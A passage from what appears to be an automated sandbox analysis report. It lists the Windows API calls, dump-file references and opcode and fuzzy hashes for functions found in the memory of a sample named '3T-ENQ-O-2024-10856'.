                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Rect$BeepClientMessageScreenWindow
                                • String ID:
                                • API String ID: 1352109105-0
                                • Opcode ID: 98482b9f119ffd5f464d6d4ab90a065eda42110e4016a1d994bbee77dfd16b27
                                • Instruction ID: 7cacde992901ad564bbd75cef47d9f2093d66b80ace116512d989dd669cb1528
                                • Opcode Fuzzy Hash: 98482b9f119ffd5f464d6d4ab90a065eda42110e4016a1d994bbee77dfd16b27
                                • Instruction Fuzzy Hash: 89415634A00219EFCB21DF59D885FA9BBF5BB59300F1885BAE41ADB251D730E942DB90
                                APIs
                                • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00CA44EE
                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CA450A
                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00CA456A
                                • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00CA45C8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: 8e5e677d8023b6728ad9acf20834d143291380a59627e21e42364427120854cf
                                • Instruction ID: fd42e766dc4cdb2cf6f57af0b2b3735bdd71a61f4443f412ad3cedc9bfb98f61
                                • Opcode Fuzzy Hash: 8e5e677d8023b6728ad9acf20834d143291380a59627e21e42364427120854cf
                                • Instruction Fuzzy Hash: 223107B1D0029A5FEF388B6598187FE7BA59BC7318F04055AF092961C1C7B49B44DB61
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C94DE8
                                • __isleadbyte_l.LIBCMT ref: 00C94E16
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C94E44
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C94E7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: eca69f7779ceaf6d2ae8f64576cfc884a7bae1c78aac6e5ff09e8ad7531e1652
                                • Instruction ID: 33a2b9bbf4436624c63e7b9bbbc25424c7f4708cbe2a82365ad5562e2224045c
                                • Opcode Fuzzy Hash: eca69f7779ceaf6d2ae8f64576cfc884a7bae1c78aac6e5ff09e8ad7531e1652
                                • Instruction Fuzzy Hash: 7D31B031600246AFDF299F75C849FBABBA5FF41310F154528E8218B1A0E730D952DB90
                                APIs
                                • GetForegroundWindow.USER32 ref: 00CC7AB6
                                  • Part of subcall function 00CA69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CA69E3
                                  • Part of subcall function 00CA69C9: GetCurrentThreadId.KERNEL32 ref: 00CA69EA
                                  • Part of subcall function 00CA69C9: AttachThreadInput.USER32(00000000,?,00CA8127), ref: 00CA69F1
                                • GetCaretPos.USER32(?), ref: 00CC7AC7
                                • ClientToScreen.USER32(00000000,?), ref: 00CC7B00
                                • GetForegroundWindow.USER32 ref: 00CC7B06
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                • String ID:
                                • API String ID: 2759813231-0
                                • Opcode ID: 0db66bd2be7393690b5bd6be261744e4dd27df08bd5c852572a1d212e1dc03cb
                                • Instruction ID: e26f1e89d887ef62168db311f7c891013ea0699e9270cea967997430dc419bd1
                                • Opcode Fuzzy Hash: 0db66bd2be7393690b5bd6be261744e4dd27df08bd5c852572a1d212e1dc03cb
                                • Instruction Fuzzy Hash: 3331FD72D00108AFCB00EFB5DC859EFBBFDEF58314B10806AE856E7211DA359E059BA0
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • GetCursorPos.USER32(?), ref: 00CCEFE2
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CDF3C3,?,?,?,?,?), ref: 00CCEFF7
                                • GetCursorPos.USER32(?), ref: 00CCF041
                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CDF3C3,?,?,?), ref: 00CCF077
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                • String ID:
                                • API String ID: 2864067406-0
                                • Opcode ID: 2eb723d84a27eeae7b44670e3642770d89bb9d8f828dd80cf64bade36365dedc
                                • Instruction ID: 08255ade713917802f65e25035dbe17ed8e517a17b7597a429f2c7fca599e9b9
                                • Opcode Fuzzy Hash: 2eb723d84a27eeae7b44670e3642770d89bb9d8f828dd80cf64bade36365dedc
                                • Instruction Fuzzy Hash: 3821B135500118FFCB258F94C898FEE7BB6EB49B54F14406DF9158B2A2C3319E52DBA0
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB49B7
                                  • Part of subcall function 00CB4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB4A60
                                  • Part of subcall function 00CB4A41: InternetCloseHandle.WININET(00000000), ref: 00CB4AFD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Internet$CloseConnectHandleOpen
                                • String ID:
                                • API String ID: 1463438336-0
                                • Opcode ID: 407c40606a8b2b9692d8b7dc677ec419a72f63f5c7d6411af177151378f80d44
                                • Instruction ID: 0076b9e87d4d031e75a978a733b396a20e86030d381a2bee2adbd5749dd1204f
                                • Opcode Fuzzy Hash: 407c40606a8b2b9692d8b7dc677ec419a72f63f5c7d6411af177151378f80d44
                                • Instruction Fuzzy Hash: 3B21D136248A05BFDB199F608C00FFBBBAEFB48701F14401AFA1696651EB719910BB94
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 00CC88A3
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC88BD
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC88CB
                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CC88D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Long$AttributesLayered
                                • String ID:
                                • API String ID: 2169480361-0
                                • Opcode ID: 27798a9caed87d26fb34c69f873262d44c0f9995078cc352c90be98554546942
                                • Instruction ID: fd687a5e5a0aca707faba791c8a03abed06989fb3569ad755bde3bea39f2b83d
                                • Opcode Fuzzy Hash: 27798a9caed87d26fb34c69f873262d44c0f9995078cc352c90be98554546942
                                • Instruction Fuzzy Hash: 62118E31205115AFDB14AB28CC85FBB7BA9EF85320F188119F816CB2E1CB70AD04DB90
                                APIs
                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00CB906D
                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00CB907F
                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00CB908C
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB90A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLastacceptselect
                                • String ID:
                                • API String ID: 385091864-0
                                • Opcode ID: ca0fcd798988025defe33fe72de10dca4bacbdd19accc11b4c5c62582bd862f6
                                • Instruction ID: 686b9d0ec2358a4bef5fdb049bb63a46eb3beaef7006c235dea913cf019af915
                                • Opcode Fuzzy Hash: ca0fcd798988025defe33fe72de10dca4bacbdd19accc11b4c5c62582bd862f6
                                • Instruction Fuzzy Hash: 14215172A001249FCB10DF69DC85BDEBBFCEF49710F00816AF94AD7290DA749A41CB90
                                APIs
                                  • Part of subcall function 00CA2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CA18FD,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?), ref: 00CA2CB9
                                  • Part of subcall function 00CA2CAA: lstrcpyW.KERNEL32(00000000,?,?,00CA18FD,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA2CDF
                                  • Part of subcall function 00CA2CAA: lstrcmpiW.KERNEL32(00000000,?,00CA18FD,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?), ref: 00CA2D10
                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA1916
                                • lstrcpyW.KERNEL32(00000000,?,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA193C
                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA1970
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: lstrcmpilstrcpylstrlen
                                • String ID: cdecl
                                • API String ID: 4031866154-3896280584
                                • Opcode ID: f2b5c4cd1ca6ea18a01fc68e99e9d73833ee490e1563447c7d4cdf429d673902
                                • Instruction ID: f66896f04c7b4f8c9bb5da3a53a5f46ff4225638ba5e7756290b533374792e48
                                • Opcode Fuzzy Hash: f2b5c4cd1ca6ea18a01fc68e99e9d73833ee490e1563447c7d4cdf429d673902
                                • Instruction Fuzzy Hash: C211D03A200306AFDB15AF74D859E7E77B9FF46364F44802AF806CB260EB319945D7A0
                                APIs
                                • _free.LIBCMT ref: 00C93D65
                                  • Part of subcall function 00C845EC: __FF_MSGBANNER.LIBCMT ref: 00C84603
                                  • Part of subcall function 00C845EC: __NMSG_WRITE.LIBCMT ref: 00C8460A
                                  • Part of subcall function 00C845EC: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,?,?,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8462F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 99b7254d15715d32d128b0a63e05a40d21da3d34e81a3a3cbe22a6addc9e44c1
                                • Instruction ID: cbf359a1a5cac963d92674f0d9476b68eee58a582d3f4cca35521ceb4fff637f
                                • Opcode Fuzzy Hash: 99b7254d15715d32d128b0a63e05a40d21da3d34e81a3a3cbe22a6addc9e44c1
                                • Instruction Fuzzy Hash: 2A110633914651ABDF313F70AC5C7AA3BA8AF00364B504425F91ADA5A2DF308A40D754
                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA715C
                                • _memset.LIBCMT ref: 00CA717D
                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CA71CF
                                • CloseHandle.KERNEL32(00000000), ref: 00CA71D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                • String ID:
                                • API String ID: 1157408455-0
                                • Opcode ID: 61d8e74e274752a0b4ae53eaebf59dbe75e3d1716ce214bdee3e7f8777045ecf
                                • Instruction ID: 414daab7db553aa9c9cb6e41ae151593a9ac14d51aba2a897643e55bd36af2fa
                                • Opcode Fuzzy Hash: 61d8e74e274752a0b4ae53eaebf59dbe75e3d1716ce214bdee3e7f8777045ecf
                                • Instruction Fuzzy Hash: F911EC729012287AD7306B65AC4DFEFBABCEF45764F10429AF509E71D0D2744F808BA4
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CA13EE
                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CA1409
                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CA141F
                                • FreeLibrary.KERNEL32(?), ref: 00CA1474
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                • String ID:
                                • API String ID: 3137044355-0
                                • Opcode ID: 1074057c00dfcbfe5bdc856cf9fb8ced98e7ed513f6972888b0b6e81b2f5003d
                                • Instruction ID: 29a40b234fa71b5a1d832acf7c5f711b73db280f5ae0ec1766c1ca49b48ccb20
                                • Opcode Fuzzy Hash: 1074057c00dfcbfe5bdc856cf9fb8ced98e7ed513f6972888b0b6e81b2f5003d
                                • Instruction Fuzzy Hash: 5421AF7150020AAFDB209F95DC88ADABBB8EF05748F048469A92297010D774EA44DF51
                                APIs
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F282
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F2A6
                                • gethostbyname.WSOCK32(?,?,?), ref: 00CB92F0
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB92FB
                                • _memmove.LIBCMT ref: 00CB9328
                                • inet_ntoa.WSOCK32(?), ref: 00CB9333
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                • String ID:
                                • API String ID: 1504782959-0
                                • Opcode ID: d2b80bc84df8043811f8bd6b86defaa1992767420419c2b2d9dc7b3db4d8fab7
                                • Instruction ID: 5f52bf430fb8b9fa2525c45873c0f36ac372c5fcd7169aa2d54ecb51b5341e0b
                                • Opcode Fuzzy Hash: d2b80bc84df8043811f8bd6b86defaa1992767420419c2b2d9dc7b3db4d8fab7
                                • Instruction Fuzzy Hash: E4114F76500109AFCB14FBA4CD96DEE77B9EF08314B144065F506A72A2DF30EE05EB62
                                APIs
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C285
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9C297
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9C2AD
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9C2C8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: fa18afb7071b8478c36d6025da7fffad29dd757d0162e7758b979c3f74468bbf
                                • Instruction ID: 1ee742aa35ac4b088882fd1994fdca1d837e020cbd5ad987ad040f791f6e6318
                                • Opcode Fuzzy Hash: fa18afb7071b8478c36d6025da7fffad29dd757d0162e7758b979c3f74468bbf
                                • Instruction Fuzzy Hash: 4C11187A940218FFDF11DBD9C885F9DBBB8FB08710F204091EA15B7294D671AE10DB94
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00CA7C6C
                                • MessageBoxW.USER32(?,?,?,?), ref: 00CA7C9F
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CA7CB5
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CA7CBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2880819207-0
                                • Opcode ID: e090e814ce3d9bfb8f0d8ea62c550f314f92762d7afb882463d436ae208092cc
                                • Instruction ID: 240c861d53d63c929afeaea78927b0b8d2f49381146a424aeebf9d077eeea264
                                • Opcode Fuzzy Hash: e090e814ce3d9bfb8f0d8ea62c550f314f92762d7afb882463d436ae208092cc
                                • Instruction Fuzzy Hash: 20110472A04358BFC712AFACDC48B9E7FADAB45338F144255F826D3391D6708A0587B5
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                • GetStockObject.GDI32(00000011), ref: 00C7C66B
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateMessageObjectSendStockWindow
                                • String ID:
                                • API String ID: 3970641297-0
                                • Opcode ID: eb94b17cc82fb998c0bf0096ae583e4b92c770eb817b461cd2d45dddef5e991e
                                • Instruction ID: f8c17c9893e5af47cb69f7c616778516cf69d82fbde9fa524c1b65181578149b
                                • Opcode Fuzzy Hash: eb94b17cc82fb998c0bf0096ae583e4b92c770eb817b461cd2d45dddef5e991e
                                • Instruction Fuzzy Hash: 7F11A172501649BFDB114FA18CC0FEABB6DFF08364F058119FA1956110C732DD60DBA0
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA49EE
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA4A13
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA4A1D
                                • Sleep.KERNEL32(?,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA4A50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CounterPerformanceQuerySleep
                                • String ID:
                                • API String ID: 2875609808-0
                                • Opcode ID: 1bd2181db2331c4c566b6081a0f0355b8638353d40d3ebb27b483e7a495a929a
                                • Instruction ID: 074d0a4b5e7d6d230868b5ab03ce1329ae519a5fde50de4d323e159a5df77dcc
                                • Opcode Fuzzy Hash: 1bd2181db2331c4c566b6081a0f0355b8638353d40d3ebb27b483e7a495a929a
